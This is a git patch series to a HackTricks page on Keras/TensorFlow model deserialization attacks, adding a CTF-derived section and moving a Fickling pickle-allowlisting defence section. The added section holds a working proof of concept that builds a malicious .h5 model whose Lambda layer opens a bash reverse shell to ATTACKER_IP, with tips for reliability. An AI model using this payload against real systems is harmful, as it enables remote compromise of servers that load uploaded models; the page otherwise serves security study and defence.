From 6727848590651da5bbe4dffccab7b853e7955a67 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 25 Oct 2025 18:31:17 +0000 Subject: [PATCH 1/3] =?UTF-8?q?Add=20content=20from:=20HTB=20Artificial:?= =?UTF-8?q?=20TensorFlow=20.h5=20model=20RCE=20=E2=86=92=20Backrest=20cred?= =?UTF-8?q?s=20le...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...-deserialization-rce-and-gadget-hunting.md | 100 +++++++----------- 1 file changed, 39 insertions(+), 61 deletions(-) diff --git a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md index 1e98392c9b7..86b01086c9b 100644 --- a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md +++ b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md @@ -91,6 +91,39 @@ Security improvements (Keras ≥ 3.9): - Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading - Basic type checking: deserialized objects must match expected types +## Practical exploitation: TensorFlow-Keras HDF5 (.h5) Lambda RCE + +Many production stacks still accept legacy TensorFlow-Keras HDF5 model files (.h5). If an attacker can upload a model that the server later loads or runs inference on, a Lambda layer can execute arbitrary Python on load/build/predict. + +Minimal PoC to craft a malicious .h5 that executes a reverse shell when deserialized or used: + +```python +import tensorflow as tf + +def exploit(x): + import os + os.system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'") + return x + +m = tf.keras.Sequential() +m.add(tf.keras.layers.Input(shape=(64,))) +m.add(tf.keras.layers.Lambda(exploit)) +m.compile() +m.save("exploit.h5") # legacy HDF5 container +``` + +Notes and reliability tips: +- Trigger points: code may run multiple times (e.g., during layer build/first call, model.load_model, and predict/fit). Make payloads idempotent. +- Version pinning: match the victim’s TF/Keras/Python to avoid serialization mismatches. For example, build artifacts under Python 3.8 with TensorFlow 2.13.1 if that’s what the target uses. +- Quick environment replication: + +```dockerfile +FROM python:3.8-slim +RUN pip install tensorflow-cpu==2.13.1 +``` + +- Validation: a benign payload like os.system("ping -c 1 YOUR_IP") helps confirm execution (e.g., observe ICMP with tcpdump) before switching to a reverse shell. + ## Post-fix gadget surface inside allowlist Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations. @@ -127,6 +160,9 @@ Potential impacts of allowlisted gadgets: Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects. +
+Enumerate potentially dangerous callables in allowlisted Keras modules + ```python import importlib, inspect, pkgutil @@ -170,6 +206,8 @@ for root in ALLOWLIST: print("\n".join(sorted(candidates)[:200])) ``` +
+ 2) Direct deserialization testing (no .keras archive needed) Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects. @@ -199,61 +237,6 @@ Keras exists in multiple codebases/eras with different guardrails and formats: Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards. -## Defensive recommendations - -- Treat model files as untrusted input. Only load models from trusted sources. -- Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks. -- Do not set safe_mode=False when loading models unless you fully trust the file. -- Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access. -- Enforce allowlists/signatures for model sources and integrity checking where possible. - -## ML pickle import allowlisting for AI/ML models (Fickling) - -Many AI/ML model formats (PyTorch .pt/.pth/.ckpt, joblib/scikit-learn, older TensorFlow artifacts, etc.) embed Python pickle data. Attackers routinely abuse pickle GLOBAL imports and object constructors to achieve RCE or model swapping during load. Blacklist-based scanners often miss novel or unlisted dangerous imports. - -A practical fail-closed defense is to hook Python’s pickle deserializer and only allow a reviewed set of harmless ML-related imports during unpickling. Trail of Bits’ Fickling implements this policy and ships a curated ML import allowlist built from thousands of public Hugging Face pickles. - -Security model for “safe” imports (intuitions distilled from research and practice): imported symbols used by a pickle must simultaneously: -- Not execute code or cause execution (no compiled/source code objects, shelling out, hooks, etc.) -- Not get/set arbitrary attributes or items -- Not import or obtain references to other Python objects from the pickle VM -- Not trigger any secondary deserializers (e.g., marshal, nested pickle), even indirectly - -Enable Fickling’s protections as early as possible in process startup so that any pickle loads performed by frameworks (torch.load, joblib.load, etc.) are checked: - -```python -import fickling -# Sets global hooks on the stdlib pickle module -fickling.hook.activate_safe_ml_environment() -``` - -Operational tips: -- You can temporarily disable/re-enable the hooks where needed: - -```python -fickling.hook.deactivate_safe_ml_environment() -# ... load fully trusted files only ... -fickling.hook.activate_safe_ml_environment() -``` - -- If a known-good model is blocked, extend the allowlist for your environment after reviewing the symbols: - -```python -fickling.hook.activate_safe_ml_environment(also_allow=[ - "package.subpackage.safe_symbol", - "another.safe.import", -]) -``` - -- Fickling also exposes generic runtime guards if you prefer more granular control: - - fickling.always_check_safety() to enforce checks for all pickle.load() - - with fickling.check_safety(): for scoped enforcement - - fickling.load(path) / fickling.is_likely_safe(path) for one-off checks - -- Prefer non-pickle model formats when possible (e.g., SafeTensors). If you must accept pickle, run loaders under least privilege without network egress and enforce the allowlist. - -This allowlist-first strategy demonstrably blocks common ML pickle exploit paths while keeping compatibility high. In ToB’s benchmark, Fickling flagged 100% of synthetic malicious files and allowed ~99% of clean files from top Hugging Face repos. - ## References - [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization) @@ -262,11 +245,6 @@ This allowlist-first strategy demonstrably blocks common ML pickle exploit paths - [CVE-2025-1550 – Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550) - [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e) - [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3) -- [Trail of Bits blog – Fickling’s new AI/ML pickle file scanner](https://blog.trailofbits.com/2025/09/16/ficklings-new-ai/ml-pickle-file-scanner/) -- [Fickling – Securing AI/ML environments (README)](https://github.com/trailofbits/fickling#securing-aiml-environments) -- [Fickling pickle scanning benchmark corpus](https://github.com/trailofbits/fickling/tree/master/pickle_scanning_benchmark) -- [Picklescan](https://github.com/mmaitre314/picklescan), [ModelScan](https://github.com/protectai/modelscan), [model-unpickler](https://github.com/goeckslab/model-unpickler) -- [Sleepy Pickle attacks background](https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/) -- [SafeTensors project](https://github.com/safetensors/safetensors) +- [HTB Artificial – TensorFlow .h5 Lambda RCE to root](https://0xdf.gitlab.io/2025/10/25/htb-artificial.html) {{#include ../../banners/hacktricks-training.md}} \ No newline at end of file From 399c62f3dc51838724957ee38bc170b24eb2ad70 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 7 Nov 2025 01:42:53 +0100 Subject: [PATCH 2/3] Update keras-model-deserialization-rce-and-gadget-hunting.md --- ...-deserialization-rce-and-gadget-hunting.md | 53 +++++++++++++++++-- 1 file changed, 48 insertions(+), 5 deletions(-) diff --git a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md index 86b01086c9b..2581a35614d 100644 --- a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md +++ b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md @@ -149,10 +149,53 @@ Gadget via Lambda that references an allowed function (not serialized Python byt Important limitation: - Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable. -Potential impacts of allowlisted gadgets: -- Arbitrary download/write (path planting, config poisoning) -- Network callbacks/SSRF-like effects depending on environment -- Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists +## ML pickle import allowlisting for AI/ML models (Fickling) + +Many AI/ML model formats (PyTorch .pt/.pth/.ckpt, joblib/scikit-learn, older TensorFlow artifacts, etc.) embed Python pickle data. Attackers routinely abuse pickle GLOBAL imports and object constructors to achieve RCE or model swapping during load. Blacklist-based scanners often miss novel or unlisted dangerous imports. + +A practical fail-closed defense is to hook Python’s pickle deserializer and only allow a reviewed set of harmless ML-related imports during unpickling. Trail of Bits’ Fickling implements this policy and ships a curated ML import allowlist built from thousands of public Hugging Face pickles. + +Security model for “safe” imports (intuitions distilled from research and practice): imported symbols used by a pickle must simultaneously: +- Not execute code or cause execution (no compiled/source code objects, shelling out, hooks, etc.) +- Not get/set arbitrary attributes or items +- Not import or obtain references to other Python objects from the pickle VM +- Not trigger any secondary deserializers (e.g., marshal, nested pickle), even indirectly + +Enable Fickling’s protections as early as possible in process startup so that any pickle loads performed by frameworks (torch.load, joblib.load, etc.) are checked: + +```python +import fickling +# Sets global hooks on the stdlib pickle module +fickling.hook.activate_safe_ml_environment() +``` + +Operational tips: +- You can temporarily disable/re-enable the hooks where needed: + +```python +fickling.hook.deactivate_safe_ml_environment() +# ... load fully trusted files only ... +fickling.hook.activate_safe_ml_environment() +``` + +- If a known-good model is blocked, extend the allowlist for your environment after reviewing the symbols: + +```python +fickling.hook.activate_safe_ml_environment(also_allow=[ + "package.subpackage.safe_symbol", + "another.safe.import", +]) +``` + +- Fickling also exposes generic runtime guards if you prefer more granular control: + - fickling.always_check_safety() to enforce checks for all pickle.load() + - with fickling.check_safety(): for scoped enforcement + - fickling.load(path) / fickling.is_likely_safe(path) for one-off checks + +- Prefer non-pickle model formats when possible (e.g., SafeTensors). If you must accept pickle, run loaders under least privilege without network egress and enforce the allowlist. + +This allowlist-first strategy demonstrably blocks common ML pickle exploit paths while keeping compatibility high. In ToB’s benchmark, Fickling flagged 100% of synthetic malicious files and allowed ~99% of clean files from top Hugging Face repos. + ## Researcher toolkit @@ -247,4 +290,4 @@ Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover reg - [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3) - [HTB Artificial – TensorFlow .h5 Lambda RCE to root](https://0xdf.gitlab.io/2025/10/25/htb-artificial.html) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} From 036f9982ed913c5ec208bcfada41476d25e6a982 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 7 Nov 2025 01:52:43 +0100 Subject: [PATCH 3/3] Update keras-model-deserialization-rce-and-gadget-hunting.md --- .../keras-model-deserialization-rce-and-gadget-hunting.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md index 2581a35614d..a285543aeb9 100644 --- a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md +++ b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md @@ -289,5 +289,11 @@ Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover reg - [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e) - [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3) - [HTB Artificial – TensorFlow .h5 Lambda RCE to root](https://0xdf.gitlab.io/2025/10/25/htb-artificial.html) +- [Trail of Bits blog – Fickling’s new AI/ML pickle file scanner](https://blog.trailofbits.com/2025/09/16/ficklings-new-ai/ml-pickle-file-scanner/) +- [Fickling – Securing AI/ML environments (README)](https://github.com/trailofbits/fickling#securing-aiml-environments) +- [Fickling pickle scanning benchmark corpus](https://github.com/trailofbits/fickling/tree/master/pickle_scanning_benchmark) +- [Picklescan](https://github.com/mmaitre314/picklescan), [ModelScan](https://github.com/protectai/modelscan), [model-unpickler](https://github.com/goeckslab/model-unpickler) +- [Sleepy Pickle attacks background](https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/) +- [SafeTensors project](https://github.com/safetensors/safetensors) {{#include ../../banners/hacktricks-training.md}}